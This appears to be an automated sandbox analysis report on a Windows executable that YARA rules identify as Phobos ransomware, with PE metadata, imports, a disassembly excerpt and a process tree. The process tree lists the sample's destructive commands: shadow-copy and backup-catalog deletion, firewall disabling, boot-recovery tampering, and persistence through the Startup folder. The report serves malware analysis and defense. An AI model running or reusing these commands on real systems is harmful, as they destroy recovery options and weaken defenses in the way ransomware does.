    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^...................

    File Icon

    Icon Hash:90cececece8e8eb0

    Static PE Info

    General

    Entrypoint:0x402fa7
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x5E8350F5 [Tue Mar 31 14:17:25 2020 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:1
    File Version Major:5
    File Version Minor:1
    Subsystem Version Major:5
    Subsystem Version Minor:1
    Import Hash:851a0ba8fbb71710075bdfe6dcef92eb

    Entrypoint Preview

    Instruction
    call 00007F77B4E147FEh
    push 00000000h
    call dword ptr [0040A06Ch]
    int3
    push ebp
    mov ebp, esp
    push ecx
    push 00000000h
    push dword ptr [ebp+08h]
    call 00007F77B4E18139h
    pop ecx
    pop ecx
    pop ecx
    pop ebp
    ret
    push ebp
    mov ebp, esp
    push esi
    push edi
    push dword ptr [ebp+0Ch]
    call 00007F77B4E1AEA6h
    push 0000005Ch
    push dword ptr [ebp+0Ch]
    call 00007F77B4E1AF0Fh
    mov edi, eax
    add esp, 0Ch
    test edi, edi
    je 00007F77B4E14DB5h
    add edi, 02h
    mov eax, dword ptr [ebp+08h]
    mov esi, dword ptr [eax+0Ch]
    test esi, esi
    je 00007F77B4E14DD6h
    push dword ptr [ebp+0Ch]
    mov edx, esi
    call 00007F77B4E154C7h
    pop ecx
    test eax, eax
    jns 00007F77B4E14DC3h
    test edi, edi
    je 00007F77B4E14DC3h
    push edi
    mov edx, esi
    call 00007F77B4E154B6h
    pop ecx
    test eax, eax
    js 00007F77B4E14DB6h
    xor eax, eax
    jmp 00007F77B4E14DB5h
    xor eax, eax
    inc eax
    pop edi
    pop esi
    pop ebp
    ret
    push ebp
    mov ebp, esp
    push ebx
    push esi
    push 0000005Ch
    push dword ptr [ebp+08h]
    call 00007F77B4E1AEBFh
    mov ebx, eax
    pop ecx
    pop ecx
    test ebx, ebx
    je 00007F77B4E14DCBh
    inc ebx
    inc ebx
    je 00007F77B4E14DC7h
    push 0000002Eh
    push ebx
    call 00007F77B4E1AEABh
    mov esi, eax
    pop ecx
    pop ecx
    test esi, esi
    je 00007F77B4E14DB9h
    add esi, 02h
    jmp 00007F77B4E14DB4h
    xor esi, esi
    mov edx, dword ptr [edi]
    test edx, edx
    je 00007F77B4E14DC1h
    test esi, esi
    je 00007F77B4E14DFAh
    push esi
    call 00007F77B4E15464h
    pop ecx
    test eax, eax
    js 00007F77B4E14DEFh
    mov edx, dword ptr [edi+04h]
    test edx, edx
    je 00007F77B4E14DC1h

    Rich Headers

    Programming Language:
    • [ C ] VS2008 SP1 build 30729
    • [IMP] VS2008 SP1 build 30729
    • [ASM] VS2010 SP1 build 40219
    • [ C ] VS2010 SP1 build 40219
    • [LNK] VS2010 SP1 build 40219

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0xa4340xc8.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000x4a4.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0xa0000x1e0.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x85980x8600a491c4d91a4b5889442e891da7aad09fFalse0.6207439365671642data6.587550210952109IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0xa0000xe7c0x1000a73fadb324bbeec4e8315214d839bd02False0.488037109375data5.2778312416346775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0xb0000x26b90x6009fbb7c1ef86e2afdf0d2401013aa3bccFalse0.7317708333333334data6.177543517657492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .reloc0xe0000x5ee0x60063531957a01468434c794b6b08c13046False0.7076822916666666data5.696126590216012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    .cdata0xf0000x37080x380095155902cd30c80dca70cc3185b13c83False0.9224330357142857data7.835200976730417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

    Imports

    DLLImport
    MPR.dllWNetEnumResourceW, WNetUseConnectionW, WNetOpenEnumW, WNetCloseEnum
    WS2_32.dllioctlsocket, getpeername, ntohl, select, WSAGetLastError, htons, recv, socket, closesocket, getsockopt, WSAAddressToStringW, htonl, connect
    IPHLPAPI.DLLGetIpAddrTable
    WINHTTP.dllWinHttpReceiveResponse, WinHttpOpenRequest, WinHttpConnect, WinHttpCloseHandle, WinHttpOpen, WinHttpSendRequest
    KERNEL32.dllFindClose, FindNextFileW, SystemTimeToFileTime, OpenProcess, FindFirstFileW, MoveFileW, GetFileSizeEx, SetFilePointerEx, SetEndOfFile, GetCurrentThreadId, GetLocalTime, ExitProcess, SetFilePointer, WaitForSingleObject, GetComputerNameW, SetEvent, GetLogicalDrives, GetTickCount, Sleep, CopyFileW, GetFileAttributesW, ReadFile, CreateFileW, MultiByteToWideChar, CreateEventW, WaitForMultipleObjects, CloseHandle, SetFileAttributesW, CreateThread, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, ResetEvent, DeleteCriticalSection, AllocConsole, WriteFile, WideCharToMultiByte, WriteConsoleW, GetStdHandle, CreateMutexW, CreateProcessW, GetCurrentProcess, SetHandleInformation, HeapFree, GetLocaleInfoW, ReadProcessMemory, TerminateProcess, GetModuleFileNameW, FlushFileBuffers, OpenMutexW, GetLastError, GetProcAddress, Process32FirstW, GetExitCodeThread, CreatePipe, Process32NextW, GetModuleHandleA, CreateToolhelp32Snapshot, ReleaseMutex, GetVersion, DeleteFileW, GetCurrentProcessId, GetVolumeInformationW, ExpandEnvironmentStringsW, HeapAlloc, GetProcessHeap, HeapReAlloc, QueryPerformanceCounter
    USER32.dllGetWindowThreadProcessId, GetShellWindow
    ADVAPI32.dllFreeSid, LookupPrivilegeValueW, OpenProcessToken, GetTokenInformation, EqualSid, RegSetValueExW, RegCloseKey, AdjustTokenPrivileges, RegOpenKeyExW, LookupAccountSidW, AllocateAndInitializeSid, DuplicateTokenEx, RegQueryValueExW
    SHELL32.dllShellExecuteExW
    ole32.dllCoGetObject, CoInitializeEx, CoUninitialize

    Network Behavior

    No network behavior found

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:16:11:09
    Start date:07/02/2024
    Path:C:\Users\user\Desktop\Fast.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\Desktop\Fast.exe
    Imagebase:0xca0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
    Reputation:low
    Has exited:false

    General

    Target ID:2
    Start time:16:11:09
    Start date:07/02/2024
    Path:C:\Users\user\Desktop\Fast.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\Desktop\Fast.exe
    Imagebase:0xca0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000002.00000003.1779252416.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000002.00000000.1778560416.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
    Reputation:low
    Has exited:false

    General

    Target ID:3
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe
    Imagebase:0x7ff778f60000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    General

    Target ID:4
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe
    Imagebase:0x7ff778f60000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    General

    Target ID:5
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    General

    Target ID:6
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    General

    Target ID:7
    Start time:16:11:17
    Start date:07/02/2024
    Path:C:\Windows\System32\vssadmin.exe
    Wow64 process (32bit):false
    Commandline:vssadmin delete shadows /all /quiet
    Imagebase:0x7ff63b540000
    File size:145'920 bytes
    MD5 hash:B58073DB8892B67A672906C9358020EC
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:8
    Start time:16:11:17
    Start date:07/02/2024
    Path:C:\Windows\System32\netsh.exe
    Wow64 process (32bit):false
    Commandline:netsh advfirewall set currentprofile state off
    Imagebase:0x7ff72d2e0000
    File size:96'768 bytes
    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:10
    Start time:16:11:21
    Start date:07/02/2024
    Path:C:\Windows\System32\netsh.exe
    Wow64 process (32bit):false
    Commandline:netsh firewall set opmode mode=disable
    Imagebase:0x7ff72d2e0000
    File size:96'768 bytes
    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:14
    Start time:16:11:26
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Local\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Fast.exe"
    Imagebase:0xd0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    Antivirus matches:
    • Detection: 89%, ReversingLabs
    Reputation:low
    Has exited:true

    General

    Target ID:16
    Start time:16:11:28
    Start date:07/02/2024
    Path:C:\Windows\System32\wbem\WMIC.exe
    Wow64 process (32bit):false
    Commandline:wmic shadowcopy delete
    Imagebase:0x7ff777a20000
    File size:576'000 bytes
    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:17
    Start time:16:11:34
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Local\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Fast.exe"
    Imagebase:0xd0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000011.00000000.2019602481.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000011.00000002.2024695997.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    Reputation:low
    Has exited:true

    General

    Target ID:18
    Start time:16:11:44
    Start date:07/02/2024
    Path:C:\Windows\System32\bcdedit.exe
    Wow64 process (32bit):false
    Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
    Imagebase:0x7ff7918c0000
    File size:491'864 bytes
    MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:19
    Start time:16:11:44
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Local\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Fast.exe"
    Imagebase:0xd0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    Reputation:low
    Has exited:true

    General

    Target ID:20
    Start time:16:11:47
    Start date:07/02/2024
    Path:C:\Windows\System32\bcdedit.exe
    Wow64 process (32bit):false
    Commandline:bcdedit /set {default} recoveryenabled no
    Imagebase:0x7ff7918c0000
    File size:491'864 bytes
    MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:21
    Start time:16:11:50
    Start date:07/02/2024
    Path:C:\Windows\System32\wbadmin.exe
    Wow64 process (32bit):false
    Commandline:wbadmin delete catalog -quiet
    Imagebase:0x7ff63e1c0000
    File size:329'728 bytes
    MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:22
    Start time:16:11:51
    Start date:07/02/2024
    Path:C:\Windows\System32\wbengine.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\wbengine.exe
    Imagebase:0x7ff670b20000
    File size:1'585'152 bytes
    MD5 hash:17270A354A66590953C4AAC1CF54E507
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:false

    General

    Target ID:23
    Start time:16:11:52
    Start date:07/02/2024
    Path:C:\Windows\System32\vdsldr.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\vdsldr.exe -Embedding
    Imagebase:0x7ff666bb0000
    File size:27'136 bytes
    MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    General

    Target ID:24
    Start time:16:11:52
    Start date:07/02/2024
    Path:C:\Windows\System32\vds.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\vds.exe
    Imagebase:0x7ff699200000
    File size:723'968 bytes
    MD5 hash:0781CE7ECCD9F6318BA72CD96B5B8992
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:false

    General

    Target ID:25
    Start time:16:11:54
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe"
    Imagebase:0x200000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000019.00000000.2225352024.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
    Antivirus matches:
    • Detection: 89%, ReversingLabs
    Has exited:true

    Disassembly

    Reset < >

      Execution Graph

      Execution Coverage:17.6%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:18.7%
      Total number of Nodes:1300
      Total number of Limit Nodes:21
      execution_graph 4955 ca34eb 4956 ca3509 4955->4956 4961 ca3577 4955->4961 4957 ca354b 4956->4957 4958 ca3539 ResetEvent SetEvent 4956->4958 4956->4961 4959 ca3566 4957->4959 4963 ca31c3 4957->4963 4958->4957 4960 ca356d SetEvent 4959->4960 4959->4961 4960->4961 4964 ca31d9 4963->4964 4965 ca31ce 4963->4965 4976 ca313f 4964->4976 4969 ca30af 4965->4969 4968 ca31d6 4968->4959 4970 ca30bc 4969->4970 4975 ca30ca 4969->4975 4971 ca30cd 4970->4971 4972 ca30c4 4970->4972 4974 ca9041 2 API calls 4971->4974 4973 ca907a 2 API calls 4972->4973 4973->4975 4974->4975 4975->4968 4977 ca31a0 4976->4977 4978 ca3146 4976->4978 4977->4968 4978->4977 4979 ca907a 2 API calls 4978->4979 4979->4977 3677 ca3abe 3686 ca905b 3677->3686 3679 ca3ad2 3689 ca3a18 RegOpenKeyExW 3679->3689 3682 ca3b16 3684 ca3b2a 3682->3684 3694 ca90a1 GetProcessHeap RtlFreeHeap 3682->3694 3683 ca3a18 3 API calls 3683->3682 3687 ca9068 3686->3687 3688 ca9069 GetProcessHeap HeapAlloc 3686->3688 3687->3688 3688->3679 3690 ca3a4e RegQueryValueExW 3689->3690 3691 ca3a7f 3689->3691 3692 ca3a6a RegCloseKey 3690->3692 3691->3682 3691->3683 3692->3691 3694->3684 4980 ca8ebe CreateFileW 4981 ca8ee9 GetFileSizeEx 4980->4981 4982 ca8fa2 4980->4982 4983 ca8efc CloseHandle 4981->4983 4984 ca8f96 4981->4984 4983->4982 4985 ca8f1a GetFileAttributesW 4983->4985 4984->4982 4986 ca8f9b CloseHandle 4984->4986 4985->4982 4987 ca8f28 4985->4987 4986->4982 4988 ca8f3e 4987->4988 4989 ca8f37 SetFileAttributesW 4987->4989 4990 ca8f67 4988->4990 4991 ca8f53 4988->4991 4989->4988 5015 ca8782 4990->5015 4997 ca8c42 4991->4997 4994 ca8f65 4994->4982 4995 ca8f8c SetFileAttributesW 4994->4995 4996 ca8f93 SetFileAttributesW 4994->4996 4995->4982 4996->4984 4998 ca8c5c 4997->4998 4999 ca8eaa MoveFileW 4998->4999 5000 ca8ccd MoveFileW 4998->5000 5001 ca8eb6 4999->5001 5000->4999 5002 ca8ce1 CreateFileW 5000->5002 5001->4994 5002->4999 5003 ca8d03 5002->5003 5039 ca8b60 SetFilePointerEx 5003->5039 5005 ca8e9b CloseHandle 5005->4999 5005->5001 5006 ca8d12 5006->5005 5007 ca8e15 SetFilePointerEx 5006->5007 5007->5005 5008 ca8e49 WriteFile 5007->5008 5008->5005 5009 ca8e63 5008->5009 5009->5005 5010 ca8e6e SetEndOfFile 5009->5010 5044 ca8af1 5010->5044 5013 ca8e8d FlushFileBuffers 5014 ca8e94 5013->5014 5014->5005 5016 ca87a9 5015->5016 5017 ca87e9 GetFileAttributesW 5016->5017 5018 ca8ae9 5017->5018 5019 ca8813 GetFileAttributesW 5017->5019 5018->4994 5019->5018 5020 ca8825 CreateFileW 5019->5020 5020->5018 5021 ca8847 SetFilePointerEx 5020->5021 5022 ca886a 5021->5022 5023 ca8ab9 CloseHandle 5021->5023 5022->5023 5024 ca8876 SetFilePointerEx 5022->5024 5025 ca8aca CloseHandle 5023->5025 5026 ca8acf 5023->5026 5024->5023 5027 ca889a CreateFileW 5024->5027 5025->5026 5026->5018 5028 ca8ae3 DeleteFileW 5026->5028 5027->5023 5030 ca88bf 5027->5030 5028->5018 5029 ca8957 ReadFile 5029->5030 5031 ca8974 5029->5031 5030->5023 5030->5029 5030->5031 5032 ca8929 WriteFile 5030->5032 5033 ca8979 5030->5033 5031->5023 5032->5030 5032->5031 5033->5031 5034 ca8a4d WriteFile 5033->5034 5034->5031 5035 ca8a6c 5034->5035 5035->5031 5036 ca8a85 5035->5036 5049 ca86b7 5035->5049 5036->5031 5038 ca8a8c FlushFileBuffers FlushFileBuffers 5036->5038 5038->5031 5041 ca8c31 5039->5041 5042 ca8b8a __aulldiv 5039->5042 5040 ca8bce SetFilePointerEx 5040->5041 5040->5042 5041->5006 5042->5040 5042->5041 5043 ca8bfd ReadFile 5042->5043 5043->5041 5043->5042 5048 ca8b0c 5044->5048 5045 ca8b0f SetFilePointerEx 5046 ca8b32 WriteFile 5045->5046 5047 ca8b52 5045->5047 5046->5047 5046->5048 5047->5013 5047->5014 5048->5045 5048->5047 5050 ca8fa9 5049->5050 5051 ca86d0 SetFilePointerEx 5050->5051 5052 ca86f4 SetFilePointerEx 5051->5052 5056 ca876c 5051->5056 5055 ca8719 5052->5055 5052->5056 5053 ca8757 WriteFile 5053->5056 5054 ca872a WriteFile 5054->5055 5054->5056 5055->5053 5055->5054 5055->5056 5056->5036 5057 ca1bbf 5058 ca530c 10 API calls 5057->5058 5059 ca1bd5 5058->5059 5060 ca3c7a 10 API calls 5059->5060 5061 ca1bdc 5060->5061 5062 ca9041 2 API calls 5061->5062 5063 ca1bea 5062->5063 5064 ca3955 9 API calls 5063->5064 5079 ca1bfc 5064->5079 5065 ca1c99 5066 ca1ca3 5065->5066 5081 ca90a1 GetProcessHeap RtlFreeHeap 5065->5081 5069 ca3955 9 API calls 5066->5069 5067 ca1c94 5070 ca52de 5 API calls 5067->5070 5071 ca1cb0 5069->5071 5070->5065 5082 ca90a1 GetProcessHeap RtlFreeHeap 5071->5082 5073 ca1cb9 5074 ca1c8d 5075 ca542b WaitForSingleObject 5074->5075 5075->5067 5076 ca1706 22 API calls 5076->5079 5077 ca5840 49 API calls 5077->5079 5078 ca1c44 CloseHandle 5078->5079 5079->5065 5079->5067 5079->5074 5079->5076 5079->5077 5079->5078 5080 ca1c73 CloseHandle 5079->5080 5080->5079 5081->5066 5082->5073 5083 ca42bd 5084 ca42cf 5083->5084 5086 ca4313 5083->5086 5084->5086 5087 ca411d 5084->5087 5088 ca6347 2 API calls 5087->5088 5089 ca4136 5088->5089 5090 ca413e GetModuleHandleA GetProcAddress 5089->5090 5091 ca6347 2 API calls 5090->5091 5092 ca415f 5091->5092 5093 ca4183 CoGetObject 5092->5093 5094 ca41af 5092->5094 5093->5094 5095 ca39da 2 API calls 5094->5095 5096 ca426d 5095->5096 5097 ca39b7 2 API calls 5096->5097 5098 ca4277 5097->5098 5098->5086 5099 ca4281 5100 ca428e 5099->5100 5101 ca42aa 5099->5101 5100->5101 5102 ca411d 7 API calls 5100->5102 5102->5101 5103 ca56b1 5104 ca56b3 5103->5104 5140 ca32ff 5104->5140 5107 ca9041 2 API calls 5112 ca56d0 5107->5112 5108 ca57e0 5117 ca3955 9 API calls 5108->5117 5109 ca580a 5111 ca5814 5109->5111 5161 ca32a6 EnterCriticalSection DeleteCriticalSection 5109->5161 5110 ca57fd 5110->5109 5160 ca90a1 GetProcessHeap RtlFreeHeap 5110->5160 5174 ca53e5 EnterCriticalSection 5111->5174 5112->5108 5112->5110 5118 ca3955 9 API calls 5112->5118 5116 ca581c 5180 ca90a1 GetProcessHeap RtlFreeHeap 5116->5180 5117->5110 5119 ca571d 5118->5119 5120 ca3d4b 6 API calls 5119->5120 5122 ca572a 5120->5122 5124 ca5735 CreateThread 5122->5124 5126 ca575a 5122->5126 5123 ca582d 5181 ca90a1 GetProcessHeap RtlFreeHeap 5123->5181 5124->5122 5124->5126 5128 ca578b 5126->5128 5129 ca5d61 7 API calls 5126->5129 5127 ca5834 5157 ca5962 EnterCriticalSection LeaveCriticalSection 5128->5157 5129->5128 5131 ca5796 5132 ca579f WaitForSingleObject 5131->5132 5158 ca33c5 EnterCriticalSection SetEvent SetEvent SetEvent LeaveCriticalSection 5131->5158 5159 ca33c5 EnterCriticalSection SetEvent SetEvent SetEvent LeaveCriticalSection 5132->5159 5135 ca57af WaitForMultipleObjects 5136 ca57c1 5135->5136 5137 ca57d5 5136->5137 5138 ca57ca CloseHandle 5136->5138 5139 ca3d4b 6 API calls 5137->5139 5138->5136 5139->5108 5141 ca9041 2 API calls 5140->5141 5142 ca3308 5141->5142 5143 ca3315 InitializeCriticalSectionAndSpinCount 5142->5143 5149 ca33b5 5142->5149 5144 ca332c 5143->5144 5145 ca33b7 5143->5145 5146 ca9041 2 API calls 5144->5146 5182 ca90a1 GetProcessHeap RtlFreeHeap 5145->5182 5148 ca3344 CreateEventW CreateEventW CreateEventW 5146->5148 5151 ca3391 5148->5151 5149->5107 5152 ca32a6 7 API calls 5151->5152 5153 ca339f 5151->5153 5152->5153 5154 ca31c3 4 API calls 5153->5154 5155 ca33ac 5154->5155 5155->5149 5156 ca32a6 7 API calls 5155->5156 5156->5149 5157->5131 5158->5132 5159->5135 5160->5109 5162 ca32c7 5161->5162 5163 ca32c4 CloseHandle 5161->5163 5164 ca32ce CloseHandle 5162->5164 5165 ca32d1 5162->5165 5163->5162 5164->5165 5166 ca32d8 CloseHandle 5165->5166 5168 ca32db 5165->5168 5166->5168 5167 ca32f5 5185 ca90a1 GetProcessHeap RtlFreeHeap 5167->5185 5168->5167 5169 ca32ee 5168->5169 5183 ca90a1 GetProcessHeap RtlFreeHeap 5168->5183 5184 ca90a1 GetProcessHeap RtlFreeHeap 5169->5184 5171 ca32fc 5171->5111 5175 ca540f 5174->5175 5176 ca5401 SetEvent 5174->5176 5177 ca540a LeaveCriticalSection 5175->5177 5178 ca5413 SetEvent 5175->5178 5176->5175 5176->5177 5177->5116 5178->5177 5180->5123 5181->5127 5182->5149 5183->5169 5184->5167 5185->5171 3695 ca2fa7 3698 ca29f5 3695->3698 3699 ca2f9e ExitProcess 3698->3699 3700 ca2a47 3698->3700 3700->3699 3836 ca62a6 3700->3836 3702 ca2a6f 3702->3699 3845 ca6347 3702->3845 3704 ca2a8c GetTickCount 3705 ca2aa0 3704->3705 3706 ca2aa6 GetLocaleInfoW 3705->3706 3707 ca2abe 3705->3707 3706->3707 3710 ca2ef0 3707->3710 3849 ca2876 3707->3849 3709 ca2add 3711 ca6347 2 API calls 3709->3711 3712 ca2efd 3710->3712 4236 ca597e EnterCriticalSection DeleteCriticalSection 3710->4236 3713 ca2ae5 3711->3713 3717 ca2f0e 3712->3717 3720 ca597e 4 API calls 3712->3720 3715 ca2b01 3713->3715 3861 ca271b 3713->3861 3890 ca39da 3715->3890 3721 ca2f12 EnterCriticalSection 3717->3721 3722 ca2f44 3717->3722 3720->3717 3726 ca2f28 3721->3726 3727 ca2f21 CloseHandle 3721->3727 3725 ca2876 2 API calls 3722->3725 3730 ca2f4e 3725->3730 3731 ca2f30 CloseHandle 3726->3731 3732 ca2f37 